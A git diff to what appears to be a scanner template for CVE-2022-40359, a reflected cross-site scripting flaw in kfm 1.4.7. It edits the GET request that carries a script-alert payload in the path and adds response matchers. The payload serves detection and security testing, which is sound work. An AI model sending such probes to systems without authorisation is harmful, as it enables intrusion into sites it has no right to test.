diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml
index 9ec17e0b99..d567a66ccf 100644
--- a/cves/2022/CVE-2022-40359.yaml
+++ b/cves/2022/CVE-2022-40359.yaml
@@ -1,8 +1,8 @@
 id: CVE-2022-40359
 
 info:
-  name: kfm 1.4.7 - Cross Site Scripting
-  author: edoardottt
+  name: kfm <= 1.4.7 - Reflected Cross-Site Scripting
+  author: edoardottt,daffainfo
   severity: medium
   description: |
     Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.
@@ -17,7 +17,7 @@ requests:
   - raw:
       - |
         @timeout: 10s
-        GET /kfm/index.php/'%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1
+        GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
@@ -34,4 +34,7 @@ requests:
       - type: word
         part: body
         words:
-          - "<script>alert(document.domain);</script>"
\ No newline at end of file
+          - "<script>alert(document.domain);</script>"
+          - "x_kfm_changeCaption"
+          - "kfm_copyFiles"
+        condition: and
\ No newline at end of file